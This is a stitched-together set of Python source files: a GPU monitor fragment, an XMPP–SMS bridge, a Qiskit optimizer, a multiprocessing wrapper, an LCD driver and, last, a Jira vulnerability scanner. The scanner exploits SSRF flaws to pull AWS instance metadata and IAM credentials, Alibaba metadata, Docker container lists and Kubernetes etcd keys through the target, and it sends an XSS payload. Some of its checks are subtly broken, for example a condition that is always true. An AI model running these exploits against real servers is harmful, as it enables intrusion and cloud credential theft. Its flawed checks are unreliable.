msg = f"[{gpu.pci_dev.slot_name}/{gpu.name}] over temperature, exec {self.tas} failed !!"
logger.error(msg)
syslog.syslog(syslog.LOG_ERR, msg)
else:
msg = f"[{gpu.pci_dev.slot_name}/{gpu.name}] over temperature {self.temp}c, no script defined"
logger.warning(msg)
syslog.syslog(syslog.LOG_WARNING, msg)
def update(self, gpu, t, set_flag=False):
cur_temp = gpu.get_temperature()
fan_speed = gpu.get_speed()
if set_flag:
self.gpu_dict[gpu] = {'time': t, 'temp': cur_temp, 'fan': fan_speed}
return self.gpu_dict[gpu]
if self.gpu_dict.get(gpu):
if cur_temp is not None and self.temp is not None and cur_temp < self.temp:
self.gpu_dict[gpu] = {'time': t, 'temp': cur_temp, 'fan': fan_speed}
else:
self.gpu_dict[gpu]['temp'] = cur_temp
self.gpu_dict[gpu]['fan'] = fan_speed
else:
self.gpu_dict[gpu] = {'time': t, 'temp': cur_temp, 'fan': fan_speed}
return self.gpu_dict[gpu]
def _gpu_thread(self):
syslog.syslog(syslog.LOG_INFO, 'started.')
logger.info(f"query intervel: {self.interval} wait-time: {self.wait}")
logger.info(f"temperature threshold: {self.temp}")
logger.info(f"fan control threshold: {self.fan}")
logger.info(f"script: {self.tas}")
print('\n')
while not self.abort:
time.sleep(self.interval)
t = time.time()
for gpu in self.gpu_devices:
tt = self.update(gpu, t)
if self.verbose:
rem = self.wait - int(t-tt['time'])
logger.debug(f"[{gpu.pci_dev.slot_name}/{gpu.name}] temperature {tt['temp']}c fan {tt['fan']}% ({rem}s)")
# fan speed
self._fan_control(gpu, tt['temp'])
# action scripts
if (t - tt['time']) > self.wait:
self._failure_action(gpu, tt['temp'])
tt = self.update(gpu, t, set_flag=True)
syslog.syslog(syslog.LOG_INFO, 'stopped.')
def add_gpu_devices(self, gpu_devices):
cnt = 0
for gpu in gpu_devices:
dup_flag = False
for g in self.gpu_devices:
if gpu.pci_dev.slot_name == g.pci_dev.slot_name:
dup_flag = True
logger.debug(f'duplicate slot {gpu.pci_dev.slot_name}')
break
if not dup_flag:
cnt += 1
self.gpu_devices.append(gpu)
return cnt
def start(self):
if len(self.gpu_devices) == 0:
logger.error('No GPU found !!!')
return
self.thread = Thread(target=self._gpu_thread)
self.thread.start()
def stop(self):
logger.info("exit")
self.abort = True
self.thread.join()
def set_interval(self, intvl=None, wait_period=None):
"""
wait interval must greater than interval
"""
interval = intvl if intvl else self.interval
wait_period = wait_period if wait_period else self.wait
if interval <= 0 or wait_period < interval:
logger.error(f'invalid intervals {intvl} {wait_period} !!!')
return False
self.interval = interval
self.wait = wait_period
return True
if __name__ == '__main__':
pci_devices = PciDev.discovery()
gpu_devices = []
for pdev in pci_devices:
gpu_dev = None
if pdev and pdev.is_amd():
gpu_dev = GpuAMD(pdev)
if pdev and pdev.is_nvidia():
gpu_dev = GpuNV(pdev)
# keep only devices recognized as GPUs
if gpu_dev and gpu_dev.is_gpu():
gpu_devices.append(gpu_dev)
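# A minimal sketch (not part of the original script): the threshold values below are
# illustrative assumptions; hand the discovered devices to GpuCtl and start monitoring.
gpu_ctl = GpuCtl(gpu_devices=gpu_devices, fan=60, curve=None, delta=None, temp=85, tas=None, verbose=True)
gpu_ctl.start()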
|
xmpp.py
|
import ctypes
import importlib
import multiprocessing
import queue
import time
import twilio.base.values
import twilio.rest
import slixmpp
import vbx
import vbx.util
class XMPPComponent:
class SlixmppComponent(slixmpp.ComponentXMPP):
def __init__(self, jid, secret, server, port, target, twilio_queue, timeout, target_online, running):
self.target = target
self.twilio_queue = twilio_queue
self.timeout = timeout
self.target_online = target_online
self.running = running
self.vbx_config = None # populated in session_start; recv/send handlers check it
super().__init__(jid, secret, server, port)
def run(self):
self.schedule('Check Running', self.timeout, self.check_running, repeat=True)
self.register_plugin('xep_0030') # service discovery
self.register_plugin('xep_0004') # data forms
self.register_plugin('xep_0060') # pubsub
self.register_plugin('xep_0199') # ping
self.register_plugin('xep_0172') # nick
self.add_event_handler('session_start', self.session_start)
self.add_event_handler('disconnect', self.reconnect)
self.add_event_handler('got_offline', self.set_offline)
self.add_event_handler('got_online', self.set_online)
self.add_event_handler('message', self.recv_from_xmpp)
self.schedule('Check Twilio Queue', self.timeout, self.check_twilio, repeat=True)
self.connect()
self.process(forever=True)
def check_running(self):
if not self.running.value:
self.loop.stop()
def session_start(self, data):
self.vbx_config = importlib.import_module('vbx.config')
self.twilio_client = twilio.rest.Client(username=self.vbx_config.auth[0], password=self.vbx_config.auth[1])
self.send_presence_subscription(self.target)
def reconnect(self, data):
while not self.connect():
time.sleep(5)
def set_offline(self, presence):
if presence['from'].bare != self.target:
return
self.target_online.value = 0
def set_online(self, presence):
if presence['from'].bare != self.target:
return
self.target_online.value = 1
for number, name in self.vbx_config.contacts.items():
self.send_presence(pto=self.target, pfrom=number + '@' + self.boundjid.domain, pnick=name, ptype='available')
def recv_from_xmpp(self, msg):
if not self.vbx_config:
return
if msg['from'].bare != self.target:
return
to = msg['to'].node
body, media_url = vbx.util.get_split_media(msg['body'])
self.twilio_client.messages.create(to, body=body, from_=self.vbx_config.number, media_url=media_url)
def _send_from_twilio(self, event, msg):
if not self.vbx_config:
return
from_ = event.from_ + '@' + self.boundjid.domain
if msg:
self.send_message(self.target, msg, mfrom=from_)
if event.media_url:
self.send_message(self.target, 'Media: ' + event.media_url, mfrom=from_)
def check_twilio(self):
try:
self._send_from_twilio(*self.twilio_queue.get_nowait())
except queue.Empty:
pass
def __init__(self, jid, secret, server, port, target, timeout=0.5):
self.jid = jid
self.secret = secret
self.server = server
self.port = port
self.target = target
self.timeout = timeout
self.twilio_queue = multiprocessing.Queue()
self.target_online = multiprocessing.Value(ctypes.c_bool)
self.running = multiprocessing.Value(ctypes.c_bool)
def run(self):
self.component = self.SlixmppComponent(self.jid, self.secret, self.server, self.port, self.target, self.twilio_queue, self.timeout, self.target_online, self.running)
self.running.value = True
self.component.run()
def stop(self):
self.running.value = False
def send_from_twilio(self, event, msg):
self.twilio_queue.put((event, msg))
def online(self):
return self.target_online.value > 0
class XMPP(vbx.Device):
def __init__(self, jid, secret, server, port, target):
self.component = XMPPComponent(jid, secret, server, port, target)
def start(self):
self.process = multiprocessing.Process(target=self.component.run, name='XMPPComponent')
self.process.start()
def stop(self):
self.component.stop()
def online(self):
return self.component.online()
def send(self, event, message, response):
self.component.send_from_twilio(event, message)
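# A minimal wiring sketch (not part of the original module); every connection value
# below is a placeholder that a real deployment would take from vbx configuration.
# device = XMPP('component.example.com', 'component-secret', 'xmpp.example.com', 5347,
#               'owner@example.com')
# device.start()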
|
p_bfgs.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Parallelized Limited-memory BFGS optimizer"""
from typing import Optional
import multiprocessing
import platform
import logging
import numpy as np
from scipy import optimize as sciopt
from qiskit.utils import algorithm_globals
from qiskit.utils.validation import validate_min
from .optimizer import Optimizer, OptimizerSupportLevel
logger = logging.getLogger(__name__)
class P_BFGS(Optimizer): # pylint: disable=invalid-name
"""
Parallelized Limited-memory BFGS optimizer.
P-BFGS is a parallelized version of :class:`L_BFGS_B` with which it shares the same parameters.
P-BFGS can be useful when the target hardware is a quantum simulator running on a classical
machine. This allows the multiple processes to use simulation to potentially reach a minimum
faster. The parallelization may also help the optimizer avoid getting stuck at local optima.
Uses scipy.optimize.fmin_l_bfgs_b.
For further detail, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
_OPTIONS = ["maxfun", "factr", "iprint"]
# pylint: disable=unused-argument
def __init__(
self,
maxfun: int = 1000,
factr: float = 10,
iprint: int = -1,
max_processes: Optional[int] = None,
) -> None:
r"""
Args:
maxfun: Maximum number of function evaluations.
factr : The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,
\|f\^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint: Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and \|proj g\| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes: maximum number of processes allowed, has a min. value of 1 if not None.
"""
if max_processes:
validate_min("max_processes", max_processes, 1)
super().__init__()
for k, v in list(locals().items()):
if k in self._OPTIONS:
self._options[k] = v
self._max_processes = max_processes
def get_support_level(self):
"""return support level dictionary"""
return {
"gradient": OptimizerSupportLevel.supported,
"bounds": OptimizerSupportLevel.supported,
"initial_point": OptimizerSupportLevel.required,
}
def optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
num_procs = multiprocessing.cpu_count() - 1
num_procs = (
num_procs if self._max_processes is None else min(num_procs, self._max_processes)
)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == "Darwin":
# Changed in version 3.8: On macOS, the spawn start method is now the
# default. The fork start method should be considered unsafe as it can
# lead to crashes.
# However P_BFGS doesn't support spawn, so we revert to single process.
major, minor, _ = platform.python_version_tuple()
if major > "3" or (major == "3" and minor >= "8"):
num_procs = 0
logger.warning(
"For MacOS, python >= 3.8, using only current process. "
"Multiple core use not supported."
)
elif platform.system() == "Windows":
num_procs = 0
logger.warning(
"For Windows, using only current process. " "Multiple core use not supported."
)
queue = multiprocessing.Queue()
# bounds for additional initial points in case bounds has any None values
threshold = 2 * np.pi
if variable_bounds is None:
variable_bounds = [(-threshold, threshold)] * num_vars
low = [(l if l is not None else -threshold) for (l, u) in variable_bounds]
high = [(u if u is not None else threshold) for (l, u) in variable_bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(
num_vars, objective_function, gradient_function, variable_bounds, _i_pt
)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for _ in range(num_procs):
i_pt = algorithm_globals.random.uniform(low, high) # Another random point in bounds
proc = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(proc)
proc.start()
# While the one _optimize in this process below runs, the other processes will
# be running too. This one runs with the supplied initial point; the spawned
# processes each use their own random point.
sol, opt, nfev = self._optimize(
num_vars, objective_function, gradient_function, variable_bounds, initial_point
)
for proc in processes:
# For each other process we wait now for it to finish and see if it has
# a better result than above
proc.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
return sol, opt, nfev
def _optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
super().optimize(
num_vars, objective_function, gradient_function, variable_bounds, initial_point
)
approx_grad = bool(gradient_function is None)
sol, opt, info = sciopt.fmin_l_bfgs_b(
objective_function,
initial_point,
bounds=variable_bounds,
fprime=gradient_function,
approx_grad=approx_grad,
**self._options,
)
return sol, opt, info["funcalls"]
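# A minimal usage sketch (not part of the original module); the quadratic objective
# below is only a stand-in for a real cost function.
if __name__ == "__main__":
    def _demo_objective(x):
        # Simple bowl with its minimum at (1, 1); any callable returning a float works.
        return float(np.sum((np.asarray(x) - 1.0) ** 2))

    optimizer = P_BFGS(maxfun=200, max_processes=1)
    sol, opt, nfev = optimizer.optimize(2, _demo_objective, initial_point=np.zeros(2))
    print("solution:", sol, "value:", opt, "evaluations:", nfev)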
|
spawn.py
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""A wrapper around multiprocessing to be compatible at google."""
import contextlib
import multiprocessing
import queue
Empty = queue.Empty
multiprocessing.set_start_method("fork")
# For compatibility so that it works inside Google.
@contextlib.contextmanager
def main_handler():
yield
class Process(object):
"""A wrapper around `multiprocessing` that allows it to be used at google.
It spawns a subprocess from the given target function. That function should
take an additional argument `queue` which will get a bidirectional
_ProcessQueue for communicating with the parent.
"""
def __init__(self, target, args=(), kwargs=None):
if kwargs is None:
kwargs = {}
elif "queue" in kwargs:
raise ValueError("`queue` is reserved for use by `Process`.")
q1 = multiprocessing.Queue()
q2 = multiprocessing.Queue()
self._queue = _ProcessQueue(q1, q2)
kwargs["queue"] = _ProcessQueue(q2, q1)
self._process = multiprocessing.Process(
target=target, args=args, kwargs=kwargs)
self._process.start()
def join(self, *args):
return self._process.join(*args)
@property
def exitcode(self):
return self._process.exitcode
@property
def queue(self):
return self._queue
class _ProcessQueue(object):
"""A bidirectional queue for talking to a subprocess.
`empty`, `get` and `get_nowait` act on the incoming queue, while
`full`, `put` and `put_nowait` act on the outgoing queue.
This class should only be created by the Process object.
"""
def __init__(self, q_in, q_out):
self._q_in = q_in
self._q_out = q_out
def empty(self):
return self._q_in.empty()
def full(self):
return self._q_out.full()
def get(self, block=True, timeout=None):
return self._q_in.get(block=block, timeout=timeout)
def get_nowait(self):
return self.get(False)
def put(self, obj, block=True, timeout=None):
return self._q_out.put(obj, block=block, timeout=timeout)
def put_nowait(self, obj):
return self.put(obj, False)
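# A minimal usage sketch (not part of the original module); the echo worker below is
# hypothetical and relies on the "fork" start method set above.
if __name__ == "__main__":
    def _echo_worker(queue):
        # Send back whatever the parent put on the bidirectional queue.
        queue.put(queue.get())

    with main_handler():
        proc = Process(target=_echo_worker)
        proc.queue.put("ping")
        print(proc.queue.get())  # expected: "ping"
        proc.join()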
|
dothat_driver.py
|
#!/usr/bin/env python
"""
Display-o-Tron hat driver using threading to drive the lights
and text on different update frequencies. Text data from InterfaceData.py.
Adapted from the example code at https://github.com/pimoroni/dot3k
This version incorporates python threading to run both
the lights update loop and the text update loop independently.
Commented code is, as yet, untested.
"""
import sys
import time
import signal
import threading
#import dothat.lcd as lcd
from InterfaceData import DotHatInfo
#Define an explicit signal handler
#intent is to use this to catch SIGINT
def signal_handler(signal, frame):
"""
dothat code is currently block commented.
print statement to show updates in testing.
"""
print('INFO: SIGINT/Ctrl+C received! Cleaning up.')
#End the program with a static message
# lcd.set_cursor_position(0, 0)
# lcd.write(message[:16])
# lcd.set_cursor_position(0, 1)
# lcd.write(message[16:32])
# lcd.set_cursor_position(0, 2)
# lcd.write(message[32:])
#slowly dim the 18 backlights (6 x (r+g+b)) on the way out
# for i in range(19):
# backlight.set(i,30) #0-255
# time.sleep(0.3)
# #slowly raise and then drop the bargraph leds
# for i in range(6):
# time.sleep(0.5)
# backlight.graph_set_led_state(led, 1)
# for i in range(6):
# time.sleep(0.5)
# backlight.graph_set_led_state(led, 0)
sys.exit(0)
def _write_screen(line1, line2, line3):
"""
This is untested until my dothat arrives.
"""
lcd.set_cursor_position(0, 0)
lcd.write(line1)
lcd.set_cursor_position(0, 1)
lcd.write(line2)
lcd.set_cursor_position(0, 2)
lcd.write(line3)
def _fake_write_screen(line1, line2, line3):
"""
Temp replacement for _write_screen.
"""
print("****************")
print(line1)
print(line2)
print(line3)
print("****************")
def run_lights():
"""
dothat code is currently block commented.
print statement to show updates in testing.
"""
# #initialize loop counter.
# x = 0
while True:
# x += 3
# x %= 360
print("run_lights_update")
# #Set the backlight brightness for the 6 leds x 3 colors each
# #brightness is 0-255
# for i in range(19):
# backlight.set(i,255)
#
# #Set the backlight 6 led gradient, which we will update
# #as x goes from 3 to 360 in increments of 3 (120 steps)
# backlight.sweep((360.0 - x) / 360.0)
#
# #Set the bar graph led which will oscillate slowly up and down
# backlight.set_graph(abs(math.sin(x / 100.0)))
#
# #led loop update rate
time.sleep(0.1)
def run_text():
"""
dothat code is currently block commented.
print statement to show updates in testing.
"""
#Create the data source object
dot3kdata = DotHatInfo()
while True:
#Grab a three line tuple of time/data data and print
(line1, line2, line3) = dot3kdata.time_date()
#_write_screen(line1, line2, line3)
_fake_write_screen(line1, line2, line3)
time.sleep(2)
#Grab a three line tuple of disk data and print
(line1, line2, line3) = dot3kdata.disk_info()
#_write_screen(line1, line2, line3)
_fake_write_screen(line1, line2, line3)
time.sleep(2)
#Grab a three line tuple of mem data and print
(line1, line2, line3) = dot3kdata.mem_info()
#_write_screen(line1, line2, line3)
_fake_write_screen(line1, line2, line3)
time.sleep(2)
#Grab a three line tuple of network data and print
(line1, line2, line3) = dot3kdata.network_ok()
#_write_screen(line1, line2, line3)
_fake_write_screen(line1, line2, line3)
time.sleep(2)
#Get a list of three-line tuples containing interface
#data and print them all
ifaces_screens = dot3kdata.iface_info()
for iface in ifaces_screens:
#_write_screen(iface[0], iface[1], iface[2])
_fake_write_screen(iface[0], iface[1], iface[2])
time.sleep(2)
#Start the signal handler for SIGINT
signal.signal(signal.SIGINT, signal_handler)
#Drive the dothat
lights = threading.Thread(target=run_lights,args=())
text = threading.Thread(target=run_text,args=())
lights.start()
text.start()
|
Jira-Lens.py
|
import sys
import progressbar
import json
import requests
import socket
import threading
import os
import time
from urllib.parse import urlparse
from config import *
import argparse
def clean_url(url):
while url.endswith("/"):
url=url[0:-1]
return url
def detect_version(base_url):
r=requests.get(f"{base_url}/rest/api/latest/serverInfo",allow_redirects=False,headers=headers)
try:
server_data=json.loads(str(r.content,'utf-8'))
print('\n')
print(f"\t{GREEN}-------- Server Information -----------{RESET}")
print("\n")
print(f"{DIM}{MAGENTA} [*] URL --> ",server_data.get("baseUrl"))
print(f"{DIM_RESET} [*] Server Title --> ",server_data.get("serverTitle"))
print(" [*] Version --> " ,server_data.get("version"))
print(" [*] Deployment Type --> ",server_data.get("deploymentType"))
print(" [*] Build Number --> ",server_data.get("buildNumber"))
print(" [*] Database Build Number --> ",server_data.get("databaseBuildNumber"))
try:
print(" [*] Host Address -->",socket.gethostbyaddr(urlparse(base_url).netloc)[0])
except:
print(" [*] Host Address --> Error While Resolving Host")
try:
print(" [*] IP Address -->",socket.gethostbyaddr(urlparse(base_url).netloc)[2][0])
print("\n")
except:
print(" [*] IP Address --> Error While Resolving IP Address")
print("\n")
except KeyboardInterrupt:
print (f"{RED} Keyboard Interrupt Detected {RESET}")
sys.exit(0)
except Exception as e:
print(f"{RED}An Unexpected Error Occured:{RESET} {e}")
def isaws(base_url):
try:
if "amazonaws" in socket.gethostbyaddr(urlparse(base_url).netloc)[0]:
return True
else:
return False
except:
return False
''' Different CVEs Defined For Scanning. Add New CVEs Here '''
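''' A hypothetical template (not an actual check) showing the shape a new CVE function takes '''
def CVE_TEMPLATE(base_url):
    r = requests.get(f"{base_url}/some/endpoint", allow_redirects=False, headers=headers)
    if r.status_code == 200 and "marker-string" in str(r.content):
        print(f"{RED}[+] {GREEN} [INFO]{RESET} Vulnerable To CVE-XXXX-XXXX : {base_url}/some/endpoint\n")
        response.append(f"[+] [INFO] Vulnerable To CVE-XXXX-XXXX : {base_url}/some/endpoint\n")
    else:
        print(f"{GRAY}[-] Not Vulnerable To CVE-XXXX-XXXX\n")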
def CVE_2017_9506(base_url): #(SSRF):
to_load="https://google.com"
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}",allow_redirects=False,headers=headers)
if r.status_code==200 and "googlelogo" in str(r.content):
print(f"{RED}[+] {GREEN} [CRITICAL] {RESET} Vulnerable To CVE-2017-9506 (SSRF) : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}\n")
response.append(f"[+] [CRITICAL] Vulnerable To CVE-2017-9506 (SSRF) : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}\n")
print("\tChecking For AWS Metadata Extraction\n")
if is_aws:
print("\tAWS Instance Found")
print("\tExfiltrating Data from the Insatance")
to_load="http://169.254.169.254/latest/meta-data/"
print("\n\tDUMPING AWS INSTANCE DATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_INSTANCE}",allow_redirects=False,headers=headers)
aws_instance=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS INSTANCE Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_INSTANCE}")
print("\n\tDUMPING AWS METADATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_METADATA}",allow_redirects=False,headers=headers)
aws_metadata=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS Metadata Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_METADATA}")
print("\n\tDUMPING AWS IAM DATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_IAM_DATA}",allow_redirects=False,headers=headers)
aws_iam_data=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS IAM DATA Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_IAM_DATA}\n")
filename=f"CVE-2017-9506_{urlparse(url).netloc}.txt"
with open(f"{output_folder}{filename}",'a') as cve_file:
cve_file.write(aws_instance)
cve_file.write(aws_metadata)
cve_file.write(aws_iam_data)
print(f"\tExfiltrated Data Written to [CVE-2017-9506_{urlparse(url).netloc}.txt]\n\n ")
to_load="http://100.100.100.200/latest/meta-data/"
print("\tChecking for Alibaba Metadata Exfiltration")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\t----> Alibaba Metadata Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}")
to_load="http://127.0.0.1:2375/v1.24/containers/json"
print("\tChecking for Docker Container Lists")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\t----> Docker Lists Found : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}")
to_load="http://127.0.0.1:2379/v2/keys/?recursive=true"
print("\tChecking Kubernetes ETCD API keys")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\t-----> Kubernetes ETCD API keys Found : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={to_load}")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2017-9506")
def CVE_2019_8449(base_url): # User Info Disclosure:
r=requests.get(f"{base_url}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true",allow_redirects=False,headers=headers)
#print(str(r.content))
if r.status_code==200:
if "You are not authenticated. Authentication required to perform this operation." in str(r.content):
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8449\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2019-8449 : {base_url}/rest/pi/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2019-8449 : {base_url}/rest/pi/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8449\n")
def CVE_2019_8442(base_url): #(Sensitive info disclosure):
r=requests.get(f"{base_url}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml", allow_redirects=False,headers=headers)
if r.status_code != 200:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8442\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2019-8442 : {base_url}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2019-8442 : {base_url}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n")
def CVE_2019_8443(base_url): #(Sensitive info disclosure):
r=requests.get(f"{base_url}/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml", allow_redirects=False,headers=headers)
if r.status_code == 200 or "<project" in str(r.content):
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2019-8443 : {base_url}/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2019-8443 : {base_url}/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8443\n")
def CVE_2019_8451(base_url): #(SSRF):
to_load="https://google.com"
r=requests.get(f"{base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}",allow_redirects=False,headers=headers)
if r.status_code==200 and "googlelogo" in str(r.content):
print(f"{RED}[+] {GREEN} [CRITICAL]{RESET} Vulnerable To CVE-2019-8451 (SSRF) : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}\n")
response.append(f"[+] [CRITICAL] Vulnerable To CVE-2019-8451 (SSRF) : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}\n")
print("\tChecking For AWS Metadata Extraction\n")
if is_aws:
print("\tAWS Instance Found")
print("\tExfiltrating Data from the Insatance")
to_load="http://169.254.169.254/latest/meta-data/"
print("\nDUMPING AWS INSTANCE DATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_INSTANCE}",allow_redirects=False,headers=headers)
aws_instance=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS INSTANCE Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_INSTANCE}")
print("\n\tDUMPING AWS METADATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_METADATA}",allow_redirects=False,headers=headers)
aws_metadata=str(r.content,'utf-8')
if r.status_code == 200:
print(f"AWS Metadata Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_METADATA}")
print("\n\tDUMPING AWS IAM DATA ")
r=requests.get(f"{base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_IAM_DATA}",allow_redirects=False,headers=headers)
aws_iam_data=str(r.content,'utf-8')
if r.status_code == 200:
print(f"\tAWS IAM DATA Recovered : {base_url}/plugins/servlet/oauth/users/icon-uri?consumerUri={AWS_IAM_DATA}\n")
filename=f"CVE-2019-8451_{urlparse(url).netloc}.txt"
with open(f"{output_folder}{filename}",'a') as cve_file:
cve_file.write(aws_instance)
cve_file.write(aws_metadata)
cve_file.write(aws_iam_data)
print(f"\tExfiltrated Data Written to [CVE-2019-8451_{urlparse(url).netloc}.txt] \n\n")
to_load="http://100.100.100.200/latest/meta-data/"
print("\tChecking for Alibaba Metadata Exfiltration")
r=requests.get(f"{base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\tAlibaba Metadata Recovered : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}")
to_load="http://127.0.0.1:2375/v1.24/containers/json"
print("\tChecking for Docker Container Lists")
r=requests.get(f"{base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\tDocker Lists Found : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}")
to_load="http://127.0.0.1:2379/v2/keys/?recursive=true"
print("\tChecking Kubernetes ETCD API keys\n")
r=requests.get(f"{base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}",allow_redirects=False,headers=headers)
if r.status_code == 200:
print(f"\tKubernetes ETCD API keys Found : {base_url}/plugins/servlet/gadgets/makeRequest?url={to_load}\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-8451\n")
def CVE_2019_3403(base_url): #(User enum):
r=requests.get(f"{base_url}/rest/api/2/user/picker?query=admin", allow_redirects=False,headers=headers)
#print(str(r.content))
if "The user named \'{0}\' does not exist" or "errorMessages" in str(r.content):
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-3403\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2019-3403 : {base_url}/rest/api/2/user/picker?query=admin\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2019-3403 : {base_url}/rest/api/2/user/picker?query=admin\n")
def CVE_2019_3402(base_url): #XSS in the labels gadget:
r=requests.get(f"{base_url}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(\"XSS\")%3C%2fscript%3Et1nmk&Search=Search", allow_redirects=False,headers=headers)
if "XSS" in str(r.content):
print(f"{RED}[+] {GREEN} [HIGH]{RESET} Vulnerable To CVE-2019-3402 [Maybe] : {base_url}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(\"XSS\")%3C%2fscript%3Et1nmk&Search=Search\n")
response.append(f"[+] [HIGH] Vulnerable To CVE-2019-3402 [Maybe] {base_url}/secure/ConfigurePortal: {base_url}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(\"XSS\")%3C%2fscript%3Et1nmk&Search=Search\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-3402\n")
